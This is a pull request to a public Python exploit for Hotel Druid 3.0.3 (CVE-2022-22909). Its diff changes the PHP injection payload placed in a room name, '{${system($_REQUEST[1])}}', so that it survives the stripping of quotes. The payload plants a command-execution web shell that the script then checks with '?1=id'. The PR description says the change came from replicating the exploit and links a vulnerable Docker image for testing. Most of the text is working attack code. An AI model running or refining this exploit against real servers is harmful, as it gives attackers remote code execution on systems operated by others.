### PR TITLE
Correct for quote removal

### DIFF
--- a/exploit.py
+++ b/exploit.py
@@ -1,4 +1,12 @@
-#!/usr/bin/python
+# Exploit Title: Hotel Druid 3.0.3 - Remote Code Execution (RCE)
+# Date: 05/01/2022
+# Exploit Author: 0z09e (https://twitter.com/0z09e)
+# Vendor Homepage: https://www.hoteldruid.com/
+# Software Link: https://www.hoteldruid.com/download/hoteldruid_3.0.3.tar.gz
+# Version: 3.0.3
+# CVE : CVE-2022-22909
+
+#!/usr/bin/python3
 import requests
 import argparse
 
@@ -40,7 +48,7 @@ def add_room(target , anno , token=""):
 	add_room_data = { 
 				"anno": anno,
 				"id_sessione": token,
-				"n_app":"{${system($_REQUEST['cmd'])}}",
+				"n_app":"{${system($_REQUEST[1])}}",
 				"crea_app":"SI",
 				"crea_letti":"",
 				"n_letti":"",
@@ -53,7 +61,7 @@ def add_room(target , anno , token=""):
 	else:
 		return False
 def test_code_execution(target):
-	code_execution_req = requests.get(f"{target}/dati/selectappartamenti.php?cmd=id")
+	code_execution_req = requests.get(f"{target}/dati/selectappartamenti.php?1=id")
 	if "uid=" in code_execution_req.text:
 		return code_execution_req.text.split("\n")[0]
 	else:
@@ -61,6 +69,7 @@ def test_code_execution(target):
 
 
 def main():
+
 	banner = """\n /$$   /$$             /$$               /$$       /$$$$$$$                      /$$       /$$
 | $$  | $$            | $$              | $$      | $$__  $$                    |__/      | $$
 | $$  | $$  /$$$$$$  /$$$$$$    /$$$$$$ | $$      | $$  \ $$  /$$$$$$  /$$   /$$ /$$  /$$$$$$$
@@ -68,8 +77,7 @@ def main():
 | $$__  $$| $$  \ $$  | $$    | $$$$$$$$| $$      | $$  | $$| $$  \__/| $$  | $$| $$| $$  | $$
 | $$  | $$| $$  | $$  | $$ /$$| $$_____/| $$      | $$  | $$| $$      | $$  | $$| $$| $$  | $$
 | $$  | $$|  $$$$$$/  |  $$$$/|  $$$$$$$| $$      | $$$$$$$/| $$      |  $$$$$$/| $$|  $$$$$$$
-|__/  |__/ \______/    \___/   \_______/|__/      |_______/ |__/       \______/ |__/ \_______/\n\nExploit By - 0z09e (https://twitter.com/0z09e)\n\n
-"""
+|__/  |__/ \______/    \___/   \_______/|__/      |_______/ |__/       \______/ |__/ \_______/\n\nExploit By - 0z09e (https://twitter.com/0z09e)\n\n"""
 	
 
 	parser = argparse.ArgumentParser()
@@ -126,12 +134,12 @@ def main():
 	print('[*] Testing code exection')
 	output = test_code_execution(target = target)
 	if output != False:
-		print(f"[+] Code executed successfully, Go to {target}/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.")
-		print(f'[+] Example : {target}/dati/selectappartamenti.php?cmd=id')
+		print(f"[+] Code executed successfully, Go to {target}/dati/selectappartamenti.php and execute the code with the parameter '1'.")
+		print(f'[+] Example : {target}/dati/selectappartamenti.php?1=id')
 		print(f"[+] Example Output : {output}")
 		exit()
 	else:
-		print(f"[-] Code execution failed. If the Target is Windows, Check {target}/dati/selectappartamenti.php and try execute the code with the parameter 'cmd'. Example : {target}/dati/selectappartamenti.php?cmd=hostname")
+		print(f"[-] Code execution failed. If the Target is Windows, Check {target}/dati/selectappartamenti.php and try execute the code with the parameter 'cmd'. Example : {target}/dati/selectappartamenti.php?1=hostname")
 		exit()
-if __name__ == '__main__':
-	main()
+main()
+


### PR DESCRIPTION
After attempting to replicate this exploit from your submission in exploit-db.com I realized there was an issue where quotes in the room names would be removed causing an error when using 'cmd' for the variable.

This is a quick change which uses the number 1 instead bypassing the need for quotes. I also created a docker container for you to test with if you'ld like: https://hub.docker.com/repository/docker/marktj6706/hoteldruid-3.0.3-vulnerable